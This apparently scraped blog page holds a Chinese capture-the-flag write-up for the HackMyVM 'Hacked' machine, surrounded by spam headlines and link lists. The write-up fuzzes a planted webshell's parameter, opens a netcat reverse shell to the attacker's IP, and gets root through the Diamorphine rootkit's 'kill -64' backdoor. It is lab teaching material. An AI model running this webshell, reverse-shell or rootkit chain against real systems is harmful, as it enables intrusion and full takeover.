当前位置: 首页 > news >正文

企业网站的建立联系方式做好网络推广的技巧

企业网站的建立联系方式,做好网络推广的技巧,五大搜索引擎 三大门户网站,登录我的企业邮箱tags: HMVrootkitDiamorphine Type: wp 1. 基本信息^toc 文章目录 1. 基本信息^toc2. 信息收集2.1. 端口扫描2.2. 目录扫描2.3. 获取参数 3. 提权 靶机链接 https://hackmyvm.eu/machines/machine.php?vmHacked 作者 sml 难度 ⭐️⭐️⭐️⭐️️ 2. 信息收集 2.1. 端口扫描… tags: HMVrootkitDiamorphine Type: wp 1. 基本信息^toc 文章目录 1. 基本信息^toc2. 信息收集2.1. 端口扫描2.2. 目录扫描2.3. 获取参数 3. 提权 靶机链接 https://hackmyvm.eu/machines/machine.php?vmHacked 作者 sml 难度 ⭐️⭐️⭐️⭐️️ 2. 信息收集 2.1. 端口扫描 ┌──(root㉿kali)-[/home/kali/hmv/hacked] └─# fscan -h 192.168.42.185___ _/ _ \ ___ ___ _ __ __ _ ___| | __/ /_\/____/ __|/ __| __/ _ |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| \____/ |___/\___|_| \__,_|\___|_|\_\fscan version: 1.8.4 start infoscan 192.168.42.185:22 open 192.168.42.185:80 open主页 ┌──(root㉿kali)-[/home/kali/hmv/hacked] └─# curl http://192.168.42.185/ HACKED BY h4x0r2.2. 目录扫描 ┌──(root㉿kali)-[/home/kali/hmv/hacked] └─# dirsearch -u http://192.168.42.185/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/kali/hmv/hacked/reports/http_192.168.42.185/__24-12-01_18-09-55.txtTarget: http://192.168.42.185/[18:09:55] Starting: [18:10:13] 200 - 16B - /robots.txt [18:10:14] 302 - 62B - /simple-backdoor.php - /┌──(root㉿kali)-[/home/kali/hmv/hacked] └─# curl http://192.168.42.185/robots.txt /secretnote.txt┌──(root㉿kali)-[/home/kali/hmv/hacked] └─# curl http://192.168.42.185//secretnote.txt [X] Enumeration [X] Exploitation [X] Privesc [X] Maintaining Access.|__ Webshell installed.|__ Root shell created.-h4x0r┌──(root㉿kali)-[/home/kali/hmv/hacked] └─# curl http://192.168.42.185//simple-backdoor.php I modified this webshell to only execute my secret parameter.收集到的信息 用户 h4x0r webshell /simple-backdoor.php 执行参数 未知2.3. 获取参数 从收集的这些信息当中猜测Webshell的参数 试了几个参数都不对。猜测可能是需要爆破才行 ┌──(root㉿kali)-[/home/kali/hmv/hacked] └─# ffuf -u http://192.168.42.185/simple-backdoor.php?FUZZid -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt |grep -v Size: 62/___\ /___\ /___\/\ \__/ /\ \__/ __ __ /\ \__/\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/\ \_\ \ \_\ \ \____/ \ \_\\/_/ \/_/ \/___/ \/_/v2.1.0-dev ________________________________________________:: Method : GET:: URL : http://192.168.42.185/simple-backdoor.php?FUZZid:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:: Follow redirects : false:: Calibration : false:: Timeout : 10:: Threads : 40:: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________secret [Status: 302, Size: 115, Words: 12, Lines: 2, Duration: 19ms]获取到参数是 secret 之前有在网页试过这个参数。应该是302了导致没有显示出来 抓包的话可以看到 弹shell nc -e /bin/bash 192.168.42.39 1111 nc%20-e%20%2Fbin%2Fbash%20192.168.42.39%201111[18:42:48] Welcome to pwncat ! __main__.py:164 [18:46:34] received connection from 192.168.42.185:36606 bind.py:84 [18:46:35] 192.168.42.185:36606: registered new host w/ db manager.py:957 (local) pwncat$ (remote) www-datahacked:/var/www/html$ whoami www-data (remote) www-datahacked:/var/www/html$ id uid33(www-data) gid33(www-data) groups33(www-data) (remote) www-datahacked:/var/www/html$3. 提权 这靶机上gcc编译不了。找不到Ld 可以尝试从其他版本相近的靶机编译后传过来。 这里我就不尝试了 使用linpeas进行检测。也没有发现什么利用点 去看一下wp才发现原来这里存在Rootkit https://github.com/m0nad/Diamorphine kill -63 0 取消隐藏进程 lsmod 列出加载到内核中的模块可以看到确实安装了[[…/…/26-工具使用/Diamorphine使用|Diamorphine]] [[…/…/26-工具使用/Diamorphine使用|海洛因]]有一个特征 我们发送信号64即可获取到root (remote) www-datahacked:/tmp$ kill -64 0 (remote) roothacked:/tmp$ id uid0(root) gid0(root) groups0(root),33(www-data)(remote) roothacked:/root$ sh flag.sh. *** *.,**,, ,*., *,/ *,* *,/. .*.* **,* ,*** *.** **.,* ***, ,** ***, .**. **** ,*,** *, -------------------------PWNED HOST: hackedPWNED DATE: Sun Dec 1 06:32:33 EST 2024WHOAMI: uid0(root) gid0(root) groups0(root),33(www-data)FLAG: HMVhackingthehacker------------------------remote) roothacked:/home/h4x0r$ sh flag.sh. *** *.,**,, ,*., *,/ *,* *,/. .*.* **,* ,*** *.** **.,* ***, ,** ***, .**. **** ,*,** *, -------------------------PWNED HOST: hackedPWNED DATE: Sun Dec 1 06:32:55 EST 2024WHOAMI: uid0(root) gid0(root) groups0(root),33(www-data)FLAG: HMVimthabesthacker------------------------
http://www.hkea.cn/news/14502885/

相关文章:

  • 网站建设与管理广东药学院免费行情软件网站mnw
  • 网站建设的流程范文1500字没有企业邮箱怎么认证
  • 网站建设服务费进入什么科目河北企业建站系统信息
  • 四川网站建设平台wordpress 网页压缩
  • 宁波seo网站排名优化公司最近免费中文字幕mv免费高清版
  • 大型房地产网站建设方案电影网页设计素材
  • 门户网站建设评标办法人才招聘网最新招聘
  • wordpress主题访问慢苏州网页优化服务
  • 电子商务网站建设不足深圳正规融资公司
  • 新版 网站在建设中...公式wordpress
  • 沧州网站建设定制价格制作灯笼的视频
  • 如何做网站流程图网站域名续费
  • 广州网站建设服务电话响应式网站用什么软件做效果
  • 电子商城网站的设计与实现自己建设的手机网站做百度地图定位
  • 安徽省建设厅官方网站最专业的网站建设seo优化服务公司
  • 《电子商务网站开发实训》总结网站建设 每年费用
  • 做头像网站有哪些wordpress最新文章
  • 郑州企业网站价格南头专业企业网站建设公司
  • 网站的建设步骤上海的网站设计公司
  • 东营企业网站制作创建一个平台需要什么
  • 做电商图的设计网站北京正邦设计公司官网
  • 网站开发需要多少费用静态网站提交表单怎么做
  • 做网站一般注册哪几类商标wordpress 按分类显示图片
  • 泉州市第一建设有限公司网站建设一个招聘网站
  • 做淘客的网站名称开通网站费可以做待摊费用吗
  • 吴忠门户网站建设繁体中文网站 怎么做
  • 上海都有哪些企业公司南阳seo长尾关键词
  • 网站建设与网页制作案例教程开通一个微信小程序
  • 网站制作如何做非微信官方网页自己做的网站
  • 做一个网站需要多少时间免费的导航页